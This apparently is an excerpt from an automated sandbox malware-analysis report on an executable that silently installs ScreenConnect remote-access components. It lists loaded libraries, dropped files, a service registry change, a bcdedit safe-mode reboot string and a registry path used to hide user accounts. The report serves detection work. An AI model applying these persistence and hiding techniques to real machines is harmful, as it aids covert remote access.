                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: pzPO97QouM.exeStatic PE information: certificate valid
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: pzPO97QouM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500237000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462747546.0000000004A12000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3888780873.0000000002281000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529477567.00000000009B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.2458689321.000000000008D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500081000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462868370.0000000004AC2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.Client.dll.1.drStatic PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: pzPO97QouM.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1a4ee
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51BC0 push ecx; ret 0_2_00F51BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E0D2A5 pushad ; iretd 1_2_00007FF848E0D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F25FE8 pushfd ; ret 1_2_00007FF848F662E1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F200BD pushad ; iretd 1_2_00007FF848F200C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F32157 push ebx; retf 1_2_00007FF848F3215A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848F2842D push eax; ret 1_2_00007FF848F2846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 5_2_00007FF848F04162 push eax; ret 5_2_00007FF848F04163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 5_2_00007FF848F02D68 push eax; ret 5_2_00007FF848F02E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 5_2_00007FF848F02FDA pushad ; retf 5_2_00007FF848F02FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 5_2_00007FF848F03F3A pushad ; retf 5_2_00007FF848F03F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 5_2_00007FF848F030BA push eax; iretd 5_2_00007FF848F030BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 5_2_00007FF848F0401A push eax; iretd 5_2_00007FF848F0401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeCode function: 6_2_00B618B1 push 4C024533h; retf 6_2_00B618BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF849237D84 push ss; iretd 10_2_00007FF849237D85
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 14_2_00007FF84925203F push ds; iretd 14_2_00007FF849252046

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ff0619b3-cdda-4e74-9760-149d39b5b1c0)Jump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 00000006.00000002.2462747546.0000000004A12000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.3888780873.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529477567.00000000009B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
